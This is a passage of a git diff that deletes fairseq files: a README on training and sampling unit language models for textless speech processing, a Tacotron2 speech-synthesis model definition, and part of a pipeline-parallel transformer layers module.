0, - ) - - def ordered_indices(self): - """Return an ordered list of indices. 
Batches will be constructed based - on this order.""" - return np.arange(len(self)) diff --git a/spaces/mshukor/UnIVAL/fairseq/examples/textless_nlp/gslm/ulm/README.md b/spaces/mshukor/UnIVAL/fairseq/examples/textless_nlp/gslm/ulm/README.md deleted file mode 100644 index 01459121cebefc61fdc2eae201462aa78d699111..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/examples/textless_nlp/gslm/ulm/README.md +++ /dev/null @@ -1,72 +0,0 @@ -# Unit Language Model (ULM) - -Here you can find links to the pre-trained ULMs and instructions on training new models using fairseq. At the end of the page, we also share how to run sampling for those models and provide pointers to the transcribed prompts we used. - -## Pre-trained models - -Using the links below, you can download pre-trained models for various unit types and vocabulary sizes: - -| | 50 | 100 | 200 -|-|-|-|- -| LogMel Filterbank | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/logmel/lm_km50/logmel50_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/logmel/lm_km100/logmel100_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/logmel/lm_km200/logmel200_lm.tgz) -| Modified CPC | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/cpc/lm_km50/cpc50_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/cpc/lm_km100/cpc100_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/cpc/lm_km200/cpc200_lm.tgz) -| HuBERT | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/hubert/lm_km50/hubert50_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/hubert/lm_km100/hubert100_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/hubert/lm_km200/hubert200_lm.tgz) -| Wav2Vec 2.0 | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/w2v2/lm_km50/w2v2_50_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/w2v2/lm_km100/w2v2_100_lm.tgz) | [download](https://dl.fbaipublicfiles.com/textless_nlp/gslm/w2v2/lm_km200/w2v2_200_lm.tgz) - - -## Preprocessing data -Assuming that unit-transcribed train, valid, and test sets are located in `data/train.txt`, `data/valid.txt`, and `data/test.txt`, respectively, -we run the following command to get a preprocessed version of the datast in `data-bin`: - -```bash -fairseq-preprocess --only-source \ - --trainpref data/train.txt --validpref data/valid.txt --testpref data/test.txt \ - --destdir data-bin/ --workers 40 -``` -As a result, the `data-bin` directory should appear. - -## Fitting a Unit Language Model (ULM) -As an ULM, we train a standard fairseq Transformer LM. Assuming 8 GPUs used for training, a good starting point for an ULM training would be: -```bash - fairseq-train data-bin/ \ - --task=language_modeling \ - --arch=transformer_lm_big \ - --share-decoder-input-output-embed \ - --dropout=0.1 \ - --attention-dropout=0.1 \ - --optimizer=adam \ - --adam-betas='(0.9, 0.98)' \ - --clip-norm=1.0 \ - --lr=0.0005 \ - --lr-scheduler=inverse_sqrt \ - --warmup-updates=4000 \ - --warmup-init-lr=1e-07 \ - --tokens-per-sample=3072 \ - --update-freq=16 \ - --max-tokens=4096 \ - --num-workers=4 \ - --skip-invalid-size-inputs-valid-test \ - --max-update=500000 \ - --log-interval=10 \ - --seed=100501 \ - --fp16 \ - --sample-break-mode=eos -``` -This command will train a Transformer-large model (12 layers). You can train other standard LM models provided by fairseq, e.g. specify `--arch=transformer_lm` to train a smaller (6-layer) Transformer model. 
When training with a different number of GPUs, it might be a good idea to adjust the `update-freq` parameter. To save the GPU memory at an expense of additional computation, it can be useful to enable activation checkpointing with `--checkpoint-activations`. - -## Sampling from an ULM -Once an ULM was trained, we can use it for generating new utterances. Suppose, that the prompts are given in a file named `prompts.txt`. Then we can sample continuations by running the following command: - -```bash - python sample.py data-bin/ \ - --path=checkpoints/checkpoint_best.pt --task=language_modeling --sampling --temperature=0.7 \ - --seed=1 --prompts=prompts.txt --output=samples.txt --max-len-a=0 --max-len-b=500 \ - --prefix-size=-1 --batch-size=16 --fp16 --samples-per-prompt=10 -``` -Here, `--prefix-size` controls the number of tokens that are used to prime the ULM. When set to a positive value, the sampling script will take first `prefix-size` tokens to prompt the ULM; with `0` it runs unconditional sampling and with `-1` the entire prompt is used. -`--samples-per-prompt` specifies how many utterances are generated with every prompt which can be useful when generating multiple prompt continuations. In this command, `--max-len-a` and `--max-len-b` control the number of generated tokens. - -When using a pretrained model from above, `data-bin` should point to the unpacked directory (with `dict.txt` file). - -Evaluation-time, to generate prompts, we used utterances from LibriSpeech dev-clean and test-clean that are longer than 6s. We took first 3s from an utterance as a prompt. Unit transcripts of those prompts can be downloaded here: [[dev]](https://dl.fbaipublicfiles.com/textless_nlp/gslm/eval_data/dev_prompts.tgz) [[test]](https://dl.fbaipublicfiles.com/textless_nlp/gslm/eval_data/test_prompts.tgz) - diff --git a/spaces/mshukor/UnIVAL/fairseq/examples/textless_nlp/gslm/unit2speech/tacotron2/model.py b/spaces/mshukor/UnIVAL/fairseq/examples/textless_nlp/gslm/unit2speech/tacotron2/model.py deleted file mode 100644 index ccf132b150a7cc1c125c1190b5fd8f43edaae685..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/examples/textless_nlp/gslm/unit2speech/tacotron2/model.py +++ /dev/null @@ -1,669 +0,0 @@ -from math import sqrt -import torch -import torch.distributions as distr -from torch.autograd import Variable -from torch import nn -from torch.nn import functional as F -from .layers import ConvNorm, LinearNorm, GlobalAvgPool -from .utils import to_gpu, get_mask_from_lengths - - -class LocationLayer(nn.Module): - def __init__(self, attention_n_filters, attention_kernel_size, - attention_dim): - super(LocationLayer, self).__init__() - padding = int((attention_kernel_size - 1) / 2) - self.location_conv = ConvNorm(2, attention_n_filters, - kernel_size=attention_kernel_size, - padding=padding, bias=False, stride=1, - dilation=1) - self.location_dense = LinearNorm(attention_n_filters, attention_dim, - bias=False, w_init_gain='tanh') - - def forward(self, attention_weights_cat): - processed_attention = self.location_conv(attention_weights_cat) - processed_attention = processed_attention.transpose(1, 2) - processed_attention = self.location_dense(processed_attention) - return processed_attention - - -class Attention(nn.Module): - def __init__(self, attention_rnn_dim, embedding_dim, attention_dim, - attention_location_n_filters, attention_location_kernel_size): - super(Attention, self).__init__() - self.query_layer = LinearNorm(attention_rnn_dim, attention_dim, - bias=False, 
w_init_gain='tanh') - self.memory_layer = LinearNorm(embedding_dim, attention_dim, bias=False, - w_init_gain='tanh') - self.v = LinearNorm(attention_dim, 1, bias=False) - self.location_layer = LocationLayer(attention_location_n_filters, - attention_location_kernel_size, - attention_dim) - self.score_mask_value = -float("inf") - - def get_alignment_energies(self, query, processed_memory, - attention_weights_cat): - """ - PARAMS - ------ - query: decoder output (batch, n_mel_channels * n_frames_per_step) - processed_memory: processed encoder outputs (B, T_in, attention_dim) - attention_weights_cat: cumulative and prev. att weights (B, 2, max_time) - - RETURNS - ------- - alignment (batch, max_time) - """ - - processed_query = self.query_layer(query.unsqueeze(1)) - processed_attention_weights = self.location_layer(attention_weights_cat) - energies = self.v(torch.tanh( - processed_query + processed_attention_weights + processed_memory)) - - energies = energies.squeeze(-1) - return energies - - def forward(self, attention_hidden_state, memory, processed_memory, - attention_weights_cat, mask): - """ - PARAMS - ------ - attention_hidden_state: attention rnn last output - memory: encoder outputs - processed_memory: processed encoder outputs - attention_weights_cat: previous and cummulative attention weights - mask: binary mask for padded data - """ - alignment = self.get_alignment_energies( - attention_hidden_state, processed_memory, attention_weights_cat) - - if mask is not None: - alignment.data.masked_fill_(mask, self.score_mask_value) - - attention_weights = F.softmax(alignment, dim=1) - attention_context = torch.bmm(attention_weights.unsqueeze(1), memory) - attention_context = attention_context.squeeze(1) - - return attention_context, attention_weights - - -class Prenet(nn.Module): - def __init__(self, in_dim, sizes): - super(Prenet, self).__init__() - in_sizes = [in_dim] + sizes[:-1] - self.layers = nn.ModuleList( - [LinearNorm(in_size, out_size, bias=False) - for (in_size, out_size) in zip(in_sizes, sizes)]) - - def forward(self, x): - for linear in self.layers: - x = F.dropout(F.relu(linear(x)), p=0.5, training=True) - return x - - -class Postnet(nn.Module): - """Postnet - - Five 1-d convolution with 512 channels and kernel size 5 - """ - - def __init__(self, hparams): - super(Postnet, self).__init__() - self.convolutions = nn.ModuleList() - - self.convolutions.append( - nn.Sequential( - ConvNorm(hparams.n_mel_channels, hparams.postnet_embedding_dim, - kernel_size=hparams.postnet_kernel_size, stride=1, - padding=int((hparams.postnet_kernel_size - 1) / 2), - dilation=1, w_init_gain='tanh'), - nn.BatchNorm1d(hparams.postnet_embedding_dim)) - ) - - for i in range(1, hparams.postnet_n_convolutions - 1): - self.convolutions.append( - nn.Sequential( - ConvNorm(hparams.postnet_embedding_dim, - hparams.postnet_embedding_dim, - kernel_size=hparams.postnet_kernel_size, stride=1, - padding=int((hparams.postnet_kernel_size - 1) / 2), - dilation=1, w_init_gain='tanh'), - nn.BatchNorm1d(hparams.postnet_embedding_dim)) - ) - - self.convolutions.append( - nn.Sequential( - ConvNorm(hparams.postnet_embedding_dim, hparams.n_mel_channels, - kernel_size=hparams.postnet_kernel_size, stride=1, - padding=int((hparams.postnet_kernel_size - 1) / 2), - dilation=1, w_init_gain='linear'), - nn.BatchNorm1d(hparams.n_mel_channels)) - ) - - def forward(self, x): - for i in range(len(self.convolutions) - 1): - x = F.dropout(torch.tanh(self.convolutions[i](x)), 0.5, self.training) - x = F.dropout(self.convolutions[-1](x), 
0.5, self.training) - - return x - - -class Encoder(nn.Module): - """Encoder module: - - Three 1-d convolution banks - - Bidirectional LSTM - """ - def __init__(self, hparams): - super(Encoder, self).__init__() - - convolutions = [] - for _ in range(hparams.encoder_n_convolutions): - conv_layer = nn.Sequential( - ConvNorm(hparams.encoder_embedding_dim, - hparams.encoder_embedding_dim, - kernel_size=hparams.encoder_kernel_size, stride=1, - padding=int((hparams.encoder_kernel_size - 1) / 2), - dilation=1, w_init_gain='relu'), - nn.BatchNorm1d(hparams.encoder_embedding_dim)) - convolutions.append(conv_layer) - self.convolutions = nn.ModuleList(convolutions) - - self.lstm = nn.LSTM(hparams.encoder_embedding_dim, - int(hparams.encoder_embedding_dim / 2), 1, - batch_first=True, bidirectional=True) - - def forward(self, x, input_lengths): - for conv in self.convolutions: - x = F.dropout(F.relu(conv(x)), 0.5, self.training) - - x = x.transpose(1, 2) - - # pytorch tensor are not reversible, hence the conversion - input_lengths = input_lengths.cpu().numpy() - x = nn.utils.rnn.pack_padded_sequence( - x, input_lengths, batch_first=True) - - self.lstm.flatten_parameters() - outputs, _ = self.lstm(x) - - outputs, _ = nn.utils.rnn.pad_packed_sequence( - outputs, batch_first=True) - - return outputs - - def inference(self, x): - for conv in self.convolutions: - x = F.dropout(F.relu(conv(x)), 0.5, self.training) - - x = x.transpose(1, 2) - - self.lstm.flatten_parameters() - outputs, _ = self.lstm(x) - - return outputs - - -class AudioEncoder(nn.Module): - def __init__(self, hparams): - super(AudioEncoder, self).__init__() - - assert hparams.lat_dim > 0 - - convolutions = [] - inp_dim = hparams.n_mel_channels - for _ in range(hparams.lat_n_convolutions): - conv_layer = nn.Sequential( - ConvNorm(inp_dim, hparams.lat_n_filters, - kernel_size=hparams.lat_kernel_size, stride=1, - padding=int((hparams.lat_kernel_size - 1) / 2), - dilation=1, w_init_gain='tanh'), - nn.BatchNorm1d(hparams.lat_n_filters)) - inp_dim = hparams.lat_n_filters - convolutions.append(conv_layer) - self.convolutions = nn.ModuleList(convolutions) - - self.lstm = nn.LSTM(hparams.lat_n_filters, - int(hparams.lat_n_filters / 2), - hparams.lat_n_blstms, batch_first=True, - bidirectional=True) - self.pool = GlobalAvgPool() - - self.mu_proj = LinearNorm(hparams.lat_n_filters, hparams.lat_dim) - self.logvar_proj = LinearNorm(hparams.lat_n_filters, hparams.lat_dim) - self.lat_dim = hparams.lat_dim - - def forward(self, x, lengths): - """ - Args: - x (torch.Tensor): (B, F, T) - """ - - for conv in self.convolutions: - x = F.dropout(F.tanh(conv(x)), 0.5, self.training) - - x = x.transpose(1, 2) # (B, T, D) - - # x may not be sorted by length. 
Sort->process->unsort - max_len = x.size(1) - assert max_len == torch.max(lengths).item() - - lengths, perm_idx = lengths.sort(0, descending=True) - x = x[perm_idx] - x = nn.utils.rnn.pack_padded_sequence(x, lengths, batch_first=True) - - self.lstm.flatten_parameters() - outputs, _ = self.lstm(x) - outputs, _ = nn.utils.rnn.pad_packed_sequence(outputs, batch_first=True) - - _, unperm_idx = perm_idx.sort(0) - outputs = outputs[unperm_idx] # (B, T, D) - lengths = lengths[unperm_idx] # (B, T, D) - - outputs = self.pool(outputs, lengths) # (B, D) - - mu = self.mu_proj(outputs) - logvar = self.logvar_proj(outputs) - z = distr.Normal(mu, logvar).rsample() - return z, mu, logvar - - -class Decoder(nn.Module): - def __init__(self, hparams): - super(Decoder, self).__init__() - self.n_mel_channels = hparams.n_mel_channels - self.n_frames_per_step = hparams.n_frames_per_step - self.encoder_embedding_dim = hparams.encoder_embedding_dim - self.obs_dim = hparams.obs_dim - self.lat_dim = hparams.lat_dim - self.attention_rnn_dim = hparams.attention_rnn_dim - self.decoder_rnn_dim = hparams.decoder_rnn_dim - self.prenet_dim = hparams.prenet_dim - self.max_decoder_steps = hparams.max_decoder_steps - self.gate_threshold = hparams.gate_threshold - self.p_attention_dropout = hparams.p_attention_dropout - self.p_decoder_dropout = hparams.p_decoder_dropout - - self.prenet = Prenet( - hparams.n_mel_channels * hparams.n_frames_per_step, - [hparams.prenet_dim, hparams.prenet_dim]) - - self.attention_rnn = nn.LSTMCell( - hparams.prenet_dim + hparams.encoder_embedding_dim, - hparams.attention_rnn_dim) - - self.attention_layer = Attention( - hparams.attention_rnn_dim, hparams.encoder_embedding_dim, - hparams.attention_dim, hparams.attention_location_n_filters, - hparams.attention_location_kernel_size) - - encoder_tot_dim = (hparams.encoder_embedding_dim + \ - hparams.lat_dim + hparams.obs_dim) - self.decoder_rnn = nn.LSTMCell( - hparams.attention_rnn_dim + encoder_tot_dim, - hparams.decoder_rnn_dim, 1) - - self.linear_projection = LinearNorm( - hparams.decoder_rnn_dim + encoder_tot_dim, - hparams.n_mel_channels * hparams.n_frames_per_step) - - self.gate_layer = LinearNorm( - hparams.decoder_rnn_dim + encoder_tot_dim, 1, - bias=True, w_init_gain='sigmoid') - - def get_go_frame(self, memory): - """ Gets all zeros frames to use as first decoder input - PARAMS - ------ - memory: decoder outputs - - RETURNS - ------- - decoder_input: all zeros frames - """ - B = memory.size(0) - decoder_input = Variable(memory.data.new( - B, self.n_mel_channels * self.n_frames_per_step).zero_()) - return decoder_input - - def initialize_decoder_states(self, memory, obs_and_lat, mask): - """ Initializes attention rnn states, decoder rnn states, attention - weights, attention cumulative weights, attention context, stores memory - and stores processed memory - PARAMS - ------ - memory: Encoder outputs - obs_and_lat: Observed and latent attribute embeddings - mask: Mask for padded data if training, expects None for inference - """ - B = memory.size(0) - MAX_TIME = memory.size(1) - - self.attention_hidden = Variable(memory.data.new( - B, self.attention_rnn_dim).zero_()) - self.attention_cell = Variable(memory.data.new( - B, self.attention_rnn_dim).zero_()) - - self.decoder_hidden = Variable(memory.data.new( - B, self.decoder_rnn_dim).zero_()) - self.decoder_cell = Variable(memory.data.new( - B, self.decoder_rnn_dim).zero_()) - - self.attention_weights = Variable(memory.data.new( - B, MAX_TIME).zero_()) - self.attention_weights_cum = 
Variable(memory.data.new( - B, MAX_TIME).zero_()) - self.attention_context = Variable(memory.data.new( - B, self.encoder_embedding_dim).zero_()) - - self.memory = memory - self.processed_memory = self.attention_layer.memory_layer(memory) - self.obs_and_lat = obs_and_lat - self.mask = mask - - def parse_decoder_inputs(self, decoder_inputs): - """ Prepares decoder inputs, i.e. mel outputs - PARAMS - ------ - decoder_inputs: inputs used for teacher-forced training, i.e. mel-specs - - RETURNS - ------- - inputs: processed decoder inputs - - """ - # (B, n_mel_channels, T_out) -> (B, T_out, n_mel_channels) - decoder_inputs = decoder_inputs.transpose(1, 2) - decoder_inputs = decoder_inputs.view( - decoder_inputs.size(0), - int(decoder_inputs.size(1)/self.n_frames_per_step), -1) - # (B, T_out, n_mel_channels) -> (T_out, B, n_mel_channels) - decoder_inputs = decoder_inputs.transpose(0, 1) - return decoder_inputs - - def parse_decoder_outputs(self, mel_outputs, gate_outputs, alignments): - """ Prepares decoder outputs for output - PARAMS - ------ - mel_outputs: - gate_outputs: gate output energies - alignments: - - RETURNS - ------- - mel_outputs: - gate_outpust: gate output energies - alignments: - """ - # (T_out, B) -> (B, T_out) - alignments = torch.stack(alignments).transpose(0, 1) - # (T_out, B) -> (B, T_out) - gate_outputs = torch.stack(gate_outputs).transpose(0, 1) - gate_outputs = gate_outputs.contiguous() - # (T_out, B, n_mel_channels) -> (B, T_out, n_mel_channels) - mel_outputs = torch.stack(mel_outputs).transpose(0, 1).contiguous() - # decouple frames per step - mel_outputs = mel_outputs.view( - mel_outputs.size(0), -1, self.n_mel_channels) - # (B, T_out, n_mel_channels) -> (B, n_mel_channels, T_out) - mel_outputs = mel_outputs.transpose(1, 2) - - return mel_outputs, gate_outputs, alignments - - def decode(self, decoder_input): - """ Decoder step using stored states, attention and memory - PARAMS - ------ - decoder_input: previous mel output - - RETURNS - ------- - mel_output: - gate_output: gate output energies - attention_weights: - """ - cell_input = torch.cat((decoder_input, self.attention_context), -1) - self.attention_hidden, self.attention_cell = self.attention_rnn( - cell_input, (self.attention_hidden, self.attention_cell)) - self.attention_hidden = F.dropout( - self.attention_hidden, self.p_attention_dropout, self.training) - - attention_weights_cat = torch.cat( - (self.attention_weights.unsqueeze(1), - self.attention_weights_cum.unsqueeze(1)), dim=1) - self.attention_context, self.attention_weights = self.attention_layer( - self.attention_hidden, self.memory, self.processed_memory, - attention_weights_cat, self.mask) - - self.attention_weights_cum += self.attention_weights - decoder_input = torch.cat( - (self.attention_hidden, self.attention_context), -1) - if self.obs_and_lat is not None: - decoder_input = torch.cat((decoder_input, self.obs_and_lat), -1) - self.decoder_hidden, self.decoder_cell = self.decoder_rnn( - decoder_input, (self.decoder_hidden, self.decoder_cell)) - self.decoder_hidden = F.dropout( - self.decoder_hidden, self.p_decoder_dropout, self.training) - - decoder_hidden_attention_context = torch.cat( - (self.decoder_hidden, self.attention_context), dim=1) - if self.obs_and_lat is not None: - decoder_hidden_attention_context = torch.cat( - (decoder_hidden_attention_context, self.obs_and_lat), dim=1) - decoder_output = self.linear_projection( - decoder_hidden_attention_context) - - gate_prediction = self.gate_layer(decoder_hidden_attention_context) - return 
decoder_output, gate_prediction, self.attention_weights - - def forward(self, memory, obs_and_lat, decoder_inputs, memory_lengths): - """ Decoder forward pass for training - PARAMS - ------ - memory: Encoder outputs - obs_and_lat: Observed and latent attribute embeddings - decoder_inputs: Decoder inputs for teacher forcing. i.e. mel-specs - memory_lengths: Encoder output lengths for attention masking. - - RETURNS - ------- - mel_outputs: mel outputs from the decoder - gate_outputs: gate outputs from the decoder - alignments: sequence of attention weights from the decoder - """ - - decoder_input = self.get_go_frame(memory).unsqueeze(0) - decoder_inputs = self.parse_decoder_inputs(decoder_inputs) - decoder_inputs = torch.cat((decoder_input, decoder_inputs), dim=0) - decoder_inputs = self.prenet(decoder_inputs) - - self.initialize_decoder_states( - memory, obs_and_lat, mask=~get_mask_from_lengths(memory_lengths)) - - mel_outputs, gate_outputs, alignments = [], [], [] - while len(mel_outputs) < decoder_inputs.size(0) - 1: - decoder_input = decoder_inputs[len(mel_outputs)] - mel_output, gate_output, attention_weights = self.decode( - decoder_input) - mel_outputs += [mel_output.squeeze(1)] - gate_outputs += [gate_output.squeeze()] - alignments += [attention_weights] - - mel_outputs, gate_outputs, alignments = self.parse_decoder_outputs( - mel_outputs, gate_outputs, alignments) - - return mel_outputs, gate_outputs, alignments - - def inference(self, memory, obs_and_lat, ret_has_eos=False): - """ Decoder inference - PARAMS - ------ - memory: Encoder outputs - obs_and_lat: Observed and latent attribute embeddings - - RETURNS - ------- - mel_outputs: mel outputs from the decoder - gate_outputs: gate outputs from the decoder - alignments: sequence of attention weights from the decoder - """ - decoder_input = self.get_go_frame(memory) - - self.initialize_decoder_states(memory, obs_and_lat, mask=None) - - mel_outputs, gate_outputs, alignments = [], [], [] - has_eos = False - while True: - decoder_input = self.prenet(decoder_input) - mel_output, gate_output, alignment = self.decode(decoder_input) - - mel_outputs += [mel_output.squeeze(1)] - gate_outputs += [gate_output] - alignments += [alignment] - - if torch.sigmoid(gate_output.data) > self.gate_threshold: - has_eos = True - break - elif len(mel_outputs) == self.max_decoder_steps: - # print("Warning! 
Reached max decoder steps") - break - - decoder_input = mel_output - - mel_outputs, gate_outputs, alignments = self.parse_decoder_outputs( - mel_outputs, gate_outputs, alignments) - - if ret_has_eos: - return mel_outputs, gate_outputs, alignments, has_eos - else: - return mel_outputs, gate_outputs, alignments - - -class Tacotron2(nn.Module): - def __init__(self, hparams): - super(Tacotron2, self).__init__() - self.mask_padding = hparams.mask_padding - self.fp16_run = hparams.fp16_run - self.n_mel_channels = hparams.n_mel_channels - self.n_frames_per_step = hparams.n_frames_per_step - - # initialize text encoder embedding - self.embedding = nn.Embedding( - hparams.n_symbols, hparams.symbols_embedding_dim) - std = sqrt(2.0 / (hparams.n_symbols + hparams.symbols_embedding_dim)) - val = sqrt(3.0) * std # uniform bounds for std - self.embedding.weight.data.uniform_(-val, val) - - # initialize observed attribute embedding - self.obs_embedding = None - if hparams.obs_dim > 0: - self.obs_embedding = nn.Embedding( - hparams.obs_n_class, hparams.obs_dim) - std = sqrt(2.0 / (hparams.obs_n_class + hparams.obs_dim)) - val = sqrt(3.0) * std # uniform bounds for std - self.obs_embedding.weight.data.uniform_(-val, val) - - self.encoder = Encoder(hparams) - self.decoder = Decoder(hparams) - self.postnet = Postnet(hparams) - - self.lat_encoder = None - if hparams.lat_dim > 0: - self.lat_encoder = AudioEncoder(hparams) - - def parse_batch(self, batch): - (text_padded, input_lengths, obs_labels, - mel_padded, gate_padded, output_lengths) = batch - text_padded = to_gpu(text_padded).long() - input_lengths = to_gpu(input_lengths).long() - obs_labels = to_gpu(obs_labels).long() - max_len = torch.max(input_lengths.data).item() - mel_padded = to_gpu(mel_padded).float() - gate_padded = to_gpu(gate_padded).float() - output_lengths = to_gpu(output_lengths).long() - - return ( - (text_padded, input_lengths, obs_labels, - mel_padded, max_len, output_lengths), - (mel_padded, gate_padded)) - - def parse_output(self, outputs, output_lengths=None): - if self.mask_padding and output_lengths is not None: - mask = ~get_mask_from_lengths(output_lengths) - mask = mask.expand(self.n_mel_channels, mask.size(0), mask.size(1)) - mask = mask.permute(1, 0, 2) - - outputs[0].data.masked_fill_(mask, 0.0) - outputs[1].data.masked_fill_(mask, 0.0) - outputs[2].data.masked_fill_(mask[:, 0, :], 1e3) # gate energies - - return outputs - - def forward(self, inputs): - (text_inputs, text_lengths, obs_labels, - mels, max_len, output_lengths) = inputs - text_lengths, output_lengths = text_lengths.data, output_lengths.data - - embedded_inputs = self.embedding(text_inputs).transpose(1, 2) - - encoder_outputs = self.encoder(embedded_inputs, text_lengths) - - obs = None - if self.obs_embedding is not None: - obs = self.obs_embedding(obs_labels) - - lat, lat_mu, lat_logvar = None, None, None - if self.lat_encoder is not None: - (lat, lat_mu, lat_logvar) = self.lat_encoder(mels, output_lengths) - - obs_and_lat = [x for x in [obs, lat] if x is not None] - if bool(obs_and_lat): - obs_and_lat = torch.cat(obs_and_lat, dim=-1) - else: - obs_and_lat = None - - mel_outputs, gate_outputs, alignments = self.decoder( - encoder_outputs, obs_and_lat, mels, memory_lengths=text_lengths) - - mel_outputs_postnet = self.postnet(mel_outputs) - mel_outputs_postnet = mel_outputs + mel_outputs_postnet - - return self.parse_output( - [mel_outputs, mel_outputs_postnet, gate_outputs, alignments, - lat_mu, lat_logvar], - output_lengths) - - def inference(self, inputs, 
obs_labels=None, lat=None, ret_has_eos=False): - embedded_inputs = self.embedding(inputs).transpose(1, 2) - encoder_outputs = self.encoder.inference(embedded_inputs) - - if obs_labels is None: - obs_labels = torch.LongTensor(len(inputs)) - obs_labels = obs_labels.to(inputs.device).zero_() - - obs = None - if self.obs_embedding is not None: - obs = self.obs_embedding(obs_labels) - - if self.lat_encoder is not None: - if lat is None: - lat = torch.FloatTensor(len(inputs), self.lat_encoder.lat_dim) - lat = lat.to(inputs.device).zero_().type(encoder_outputs.type()) - - obs_and_lat = [x for x in [obs, lat] if x is not None] - if bool(obs_and_lat): - obs_and_lat = torch.cat(obs_and_lat, dim=-1) - else: - obs_and_lat = None - - mel_outputs, gate_outputs, alignments, has_eos = self.decoder.inference( - encoder_outputs, obs_and_lat, ret_has_eos=True) - - mel_outputs_postnet = self.postnet(mel_outputs) - mel_outputs_postnet = mel_outputs + mel_outputs_postnet - - outputs = self.parse_output( - [mel_outputs, mel_outputs_postnet, gate_outputs, alignments]) - - if ret_has_eos: - return outputs + [has_eos] - else: - return outputs diff --git a/spaces/mshukor/UnIVAL/fairseq/fairseq/model_parallel/models/pipeline_parallel_transformer/layers.py b/spaces/mshukor/UnIVAL/fairseq/fairseq/model_parallel/models/pipeline_parallel_transformer/layers.py deleted file mode 100644 index eb81ded341257ba0a43c4d0867e8f3c83f276bc7..0000000000000000000000000000000000000000 --- a/spaces/mshukor/UnIVAL/fairseq/fairseq/model_parallel/models/pipeline_parallel_transformer/layers.py +++ /dev/null @@ -1,600 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. 
- -import math -from collections import namedtuple - -import torch -import torch.nn as nn -import torch.nn.functional as F -from fairseq import options, utils -from fairseq.modules import ( - AdaptiveSoftmax, - LayerNorm, - MultiheadAttention, - PositionalEmbedding, -) - - -EncoderOut = namedtuple( - "TransformerEncoderOut", - [ - "encoder_out", # T x B x C - "encoder_padding_mask", # B x T - "encoder_embedding", # B x T x C - "encoder_states", # List[T x B x C] - ], -) - - -class TransformerEncoderEmbedding(nn.Module): - """ Encoder Embedding + Positional Embedding """ - - def __init__(self, args, embed_tokens): - super().__init__() - self.dropout = args.dropout - self.max_source_positions = args.max_source_positions - self.embed_tokens = embed_tokens - if isinstance(embed_tokens, nn.ModuleList): - self.padding_idx = embed_tokens[0].padding_idx - embed_dim = sum(e.embedding_dim for e in embed_tokens) - else: - self.padding_idx = embed_tokens.padding_idx - embed_dim = embed_tokens.embedding_dim - self.embed_scale = math.sqrt(embed_dim) - self.embed_positions = ( - PositionalEmbedding( - args.max_source_positions, - embed_dim, - self.padding_idx, - learned=args.encoder_learned_pos, - ) - if not args.no_token_positional_embeddings - else None - ) - if getattr(args, "layernorm_embedding", False): - self.layernorm_embedding = LayerNorm(embed_dim) - else: - self.layernorm_embedding = None - - def forward(self, input): - # embed tokens and positions - src_tokens = input[0] - prev_output_tokens = input[2] - if isinstance(self.embed_tokens, nn.ModuleList): - x_embed_list = [] - for embed_tokens_part in self.embed_tokens: - x_embed_list.append(embed_tokens_part(src_tokens)) - - embedded = torch.cat(x_embed_list, dim=-1) - else: - embedded = self.embed_tokens(src_tokens) - x = embed = self.embed_scale * embedded - if self.embed_positions is not None: - x = embed + self.embed_positions(src_tokens) - if self.layernorm_embedding: - x = self.layernorm_embedding(x) - x = F.dropout(x, p=self.dropout, training=self.training) - # B x T x C -> T x B x C - x = x.transpose(0, 1) - - # compute padding mask - encoder_padding_mask = src_tokens.eq(self.padding_idx) - return (x, encoder_padding_mask, prev_output_tokens) - - -class TransformerEncoderLayerNorm(nn.Module): - """ - Layer norm at the the end of all encoder layers if - args.encoder_enormalize_before = True - """ - - def __init__(self, args, embed_dim): - super().__init__() - if args.encoder_normalize_before: - self.layer_norm = LayerNorm(embed_dim) - else: - self.layer_norm = None - - def forward(self, input): - x = input[0] - encoder_padding_mask = input[1] - prev_output_tokens = input[2] - if self.layer_norm: - x = self.layer_norm(x) - # keeping track of the incremental_state is not supported yet - return (x, encoder_padding_mask, prev_output_tokens) - - -class TransformerDecoderEmbedding(nn.Module): - """ Decoder Embedding + Positional Embedding """ - - def __init__(self, args, embed_tokens): - super().__init__() - self.dropout = args.dropout - self.share_input_output_embed = args.share_decoder_input_output_embed - input_embed_dim = ( - sum(e.embedding_dim for e in embed_tokens) - if isinstance(embed_tokens, nn.ModuleList) - else embed_tokens.embedding_dim - ) - embed_dim = args.decoder_embed_dim - self.output_embed_dim = args.decoder_output_dim - - padding_idx = ( - embed_tokens[0].padding_idx - if isinstance(embed_tokens, nn.ModuleList) - else embed_tokens.padding_idx - ) - self.max_target_positions = args.max_target_positions - - self.embed_tokens 
= embed_tokens - self.embed_scale = math.sqrt(embed_dim) # todo: try with input_embed_dim - - self.project_in_dim = ( - Linear(input_embed_dim, embed_dim, bias=False) - if embed_dim != input_embed_dim - else None - ) - - self.embed_positions = ( - PositionalEmbedding( - args.max_target_positions, - embed_dim, - padding_idx, - learned=args.decoder_learned_pos, - ) - if not args.no_token_positional_embeddings - else None - ) - - def forward(self, input): - mt_task = False - if isinstance(input, tuple): - if len(input) == 3: - encoder_out = input[0] - encoder_padding_mask = input[1] - prev_output_tokens = input[2] - incremental_state = None # Hardcoding to avoid passing of None objects - mt_task = True - else: - # HACK for now, need to fix (TODO sidgoyal) - prev_output_tokens = input[0] - # discard "src_lengths" - encoder_out = None - encoder_padding_mask = None - incremental_state = None - - else: - prev_output_tokens = input - encoder_out = None - encoder_padding_mask = None - incremental_state = None - - positions = ( - self.embed_positions( - prev_output_tokens, - incremental_state=incremental_state, - ) - if self.embed_positions is not None - else None - ) - - if incremental_state is not None: - prev_output_tokens = prev_output_tokens[:, -1:] - if positions is not None: - positions = positions[:, -1:] - - # embed 